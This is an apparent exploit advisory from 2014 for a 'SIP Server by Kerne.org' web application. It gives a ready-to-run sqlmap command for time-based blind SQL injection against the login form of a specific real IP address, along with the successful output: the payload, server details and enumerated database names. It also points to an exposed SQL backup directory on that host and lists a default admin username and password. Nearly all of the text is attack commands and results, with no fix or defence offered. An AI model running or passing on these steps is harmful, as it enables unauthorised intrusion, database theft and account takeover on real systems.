facebook facebook twitter rss

SIP Server by Kerne.org - Multiple Vulnerabilties

Author: AtT4CKxT3rR0r1ST , Published: 17-05-2014
SIP Server by Kerne.org - Multiple Vulnerabilties
===================================================================

####################################################################
.:. Author : AtT4CKxT3rR0r1ST
.:. Contact : [F.Hack@w.cn] , [AtT4CKxT3rR0r1ST@gmail.com]
.:. Home : http://www.iphobos.com/blog/
.:. Script : Kerne.org
####################################################################

[1] Time-Based Blind Injection [POST]
========================================
sqlmap.py -u "http://177.129.8.146/admin/index.php" --data="action=login&bntOK=Enviar&lang=pt_BR&password=12&username=12" -p "username" --level=5 --risk=5 --dbs


sqlmap identified the following injection points with a total of 1751 HTTP(s) requests:
---
Place: POST
Parameter: username
Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: action=login&bntOK=Enviar&lang=pt_BR&password=12&username=12" AND 5946=BENCHMARK(5000000,MD5(0x5364494a)) AND "yuEM"="yuEM
---
web server operating system: Linux Ubuntu 12.04 (Precise Pangolin)
web application technology: Apache 2.2.22, PHP 5.3.10
back-end DBMS: MySQL >= 5.0.0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: username
Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: action=login&bntOK=Enviar&lang=pt_BR&password=12&username=12" AND 5946=BENCHMARK(5000000,MD5(0x5364494a)) AND "yuEM"="yuEM
---
web server operating system: Linux Ubuntu 12.04 (Precise Pangolin)
web application technology: Apache 2.2.22, PHP 5.3.10
back-end DBMS: MySQL 5
available databases [5]:
[*] billing
[*] cdr
[*] information_schema
[*] proftpd
[*] test


[2] Backup download
====================
Go To [http://177.129.8.146/admin/sql/]

You Find Sql Files And Download

[3] Default Data Admin Login:
==============================

Username: Operations
Password: k3cn18

Like us on Facebook :